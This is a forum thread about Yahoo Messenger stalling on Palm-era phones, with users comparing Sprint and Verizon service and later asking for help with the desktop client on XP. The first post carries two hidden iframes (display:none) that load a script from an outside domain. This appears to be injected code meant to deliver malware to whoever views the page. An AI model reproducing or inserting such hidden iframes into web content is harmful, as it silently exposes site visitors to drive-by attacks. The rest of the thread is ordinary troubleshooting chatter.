+ Reply to Thread

Yahoo Messenger stopped working?

Hi,

Just wondering if anyone has observed that Yahoo Messenger is no longer functioning. I can get all the way to retrieving my Friends List, but than the screen stalls (and requires soft reset of the phone or stay connected for some 5 minutes). However, when I tried it using an emulator on my PC, it worked.... Any idea?
    Thanks,
    Charlie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Yahoo Messenger

I've noticed the same thing!
    It doesn't lock up as long, but still annoying!
    It's probably been for a week now.

Me too!!

Yep, I've also noticed this. I happened across this post, and am glad that I'm not alone. I don't see much happening to fix this, as Yahoo hasn't done a lot, in my opinion, to improve the slow-ness of the Graffiti input when using Messenger (it wan't like that for me when I used Omnisky with my Palm Vx). Therefore, I wouldn't think they'll be hopping right on this latest issue.
    I wondered if it might be the Verizon network - for the other posters, are you guys on SPCS or Verizon?

I'm on Sprint. I was thinking that it might be Sprint rather than Yahoo, as it still works fine on my Emulator.
    Re: input speed. I actually have many shortcuts created, and use them to to speed up my input process.
    - Charlie

Administrator

Arrow

i believe we all are on sprint... the i300'ers anyway...

i had lag times when using the messegner on the 6035.. i have not tried it on the i300 yet.. :p

Hmm.. Service is back. Turns out to be a Yahooo issue.

I've noticed over the course of the last year that both the PDA and WAP pages at the Yahoo site frequently are "down"; on some occasions you get an error message to the effect that there is a problem with the login database, sometimes there is just no reply at all or a timeout when trying to login into Yahoo Messenger or retriving your Friends lists.

Some times this appears to go on for a couple of days....I've emailed Yahoo tech support, but not got any meaningful reply....

yahoo messenger not working

man it sucks wen i click on my yahoo messenger to sign in it doesnt even do anything i hate it.it doesnt go to anything .do u guys got any advice for me

Administrator
    ummm what program are you using?

Even i have the same prob. when i click on the y messenger icon nothing happens. i am going crazy now. i uninstalled and reinstalled the programe but still nothing happens. i have downloaded the latest version but no luck . nothing hapens. i am using XP. plz help me. send me the solution to the.rishi@rediffmail.com. plz. its urgent. Thank you all
    The Rishi ;)